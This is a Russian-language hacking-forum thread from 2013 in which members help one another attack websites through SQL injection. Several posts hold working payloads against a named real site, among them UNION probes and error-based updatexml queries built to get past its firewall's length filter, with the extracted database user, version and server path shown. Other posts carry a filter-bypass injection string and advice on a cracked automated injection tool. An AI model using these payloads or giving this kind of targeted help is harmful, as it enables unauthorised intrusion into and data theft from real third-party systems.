HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #22731  
Старый 09.09.2013, 21:37
Unknown
Guest
Сообщений: n/a
Провел на форуме:
77731

Репутация: 33
По умолчанию

Цитата:
Сообщение от narviss  
narviss said:
Можно ли что сделать с этой уязвимостью?
нет там ничего...
 
Ответить с цитированием

  #22732  
Старый 14.09.2013, 20:51
t3cHn0iD
Новичок
Регистрация: 06.04.2009
Сообщений: 2
Провел на форуме:
150479

Репутация: 2
По умолчанию

Цитата:
Сообщение от OxoTnik  
OxoTnik said:
Да можно, blabla.com/news/
%Inject_Here%
2013
2013 как default injection value выставляется как бы

Цитата:
Сообщение от Br@!ns  
Br@!ns said:
Можно ли через havij крутить ссылки типа blabla.com/news/2013 ? Или обязателен уязвимый параметр типа =999 ?
Но все же консультация по использованию кракнутого автоматического эксплуататора sql инъекций с уязвимостями никак не вяжется и да, у него есть волшебный файл справки, который называется Help.chm, там есть такой волшебный раздел, который называетсяBasic Settings -> Injecting URL Rewrite Page
 
Ответить с цитированием

  #22733  
Старый 16.09.2013, 14:19
Always
Guest
Сообщений: n/a
Провел на форуме:
17560

Репутация: 0
По умолчанию

http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+

http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка

не пойму что не так

http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+
 
Ответить с цитированием

  #22734  
Старый 16.09.2013, 16:09
m00c0w
Guest
Сообщений: n/a
Провел на форуме:
36927

Репутация: 5
По умолчанию

Цитата:
Сообщение от Always  
Always said:
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка
не пойму что не так
http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+
Too many connections. Положили сканерами.
 
Ответить с цитированием

  #22735  
Старый 16.09.2013, 16:37
kilo_star
Guest
Сообщений: n/a
Провел на форуме:
7287

Репутация: 0
По умолчанию

Запрос обрабатывается следующим скриптом:



?name=root'\**\or\**\1='1

По идее \**\ должно работать как пробел или нет? Скуль не проходит. Как можно обойти?
 
Ответить с цитированием

  #22736  
Старый 16.09.2013, 18:31
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Цитата:
Сообщение от Always  
Always said:
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка
не пойму что не так
http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+
Сайт на базе CMS Drupal

Ищите готовые эксплоиты.
 
Ответить с цитированием

  #22737  
Старый 16.09.2013, 18:35
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от kilo_star  
kilo_star said:
Запрос обрабатывается следующим скриптом:

?name=root'\**\or\**\1='1
По идее \**\ должно работать как пробел или нет? Скуль не проходит. Как можно обойти?
root'or(1)='1
 
Ответить с цитированием

  #22738  
Старый 16.09.2013, 19:23
kilo_star
Guest
Сообщений: n/a
Провел на форуме:
7287

Репутация: 0
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:
root'or(1)='1
спасибо Так а с применением /**/ можно как-то обойти?
 
Ответить с цитированием

  #22739  
Старый 17.09.2013, 06:55
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от kilo_star  
kilo_star said:
спасибо
Так а с применением /**/ можно как-то обойти?
Рассмотрим данное регулярное выражение:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/\s+/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"name"[/COLOR][COLOR="#007700"]])) {

die([/COLOR][COLOR="#DD0000"]"ERROR NO SPACE"[/COLOR][COLOR="#007700"]);

}

[/
COLOR][/COLOR
В строке производится поиск по символьному классу \s, то есть любых пробельных символов - пробел, TAB, etc... Строка, которая их не содержит или строка, длина которой больше pcre.backtrack_limit (в случае с массивом POST) фильтрацию проходит.

Использование /**/ возможно. Зависимости - mg=off поскольку sql-инъекция в кавычках.
 
Ответить с цитированием

  #22740  
Старый 17.09.2013, 09:49
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от Always  
Always said:
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка
не пойму что не так
http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+
WAFвырезает некоторые конструкции, а так-же полностью блокирует запрос по рейтингу вхождения в него опасных конструкций.

Очень жестокие фильтры, очень много критериев, в том числе проверяется длина(49 символов):

Код:
Code:
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,lpad(user(),22,0x3A),1)%23
General error: 1105 XPATH syntax error: '::::::::root@localhost'

Все сжимал буквально по одному символу, на один символ больше - уже блок, зато юзер - root При WAF - очень редкое явление.

UDP1:

Код:
Code:
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,concat(0x3A,user()),1)%23
В этом варианте concat так-же работает, если будет блок - воспользуйтесь вариантом выше.

UDP2:

Еще варианты сжатия:

Код:
Code:
При спец. символах в выводе:
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,user(),1)%23

Без них(Работает не всегда):
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,concat(':',user()),1)%23
UDP4:

Забыл про саму строку:

Код:
Code:
http://www.grafomanam.net/author/%27*updatexml(0,concat(':',version()),1)%23
5.5.33-log

Путь очень длинный:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]usr[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]local[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]apache22[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]grafomanam[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]sites[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php

[/COLOR][/COLOR
Если только блайндом таблицы выводить с брутом полей - на простой вывод идет очень много символов. MySQL на UNIX-сокете висит, так что удаленно не подключится. Или как вариант - обойти ЧПУ, если фильтр на длину в нем.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ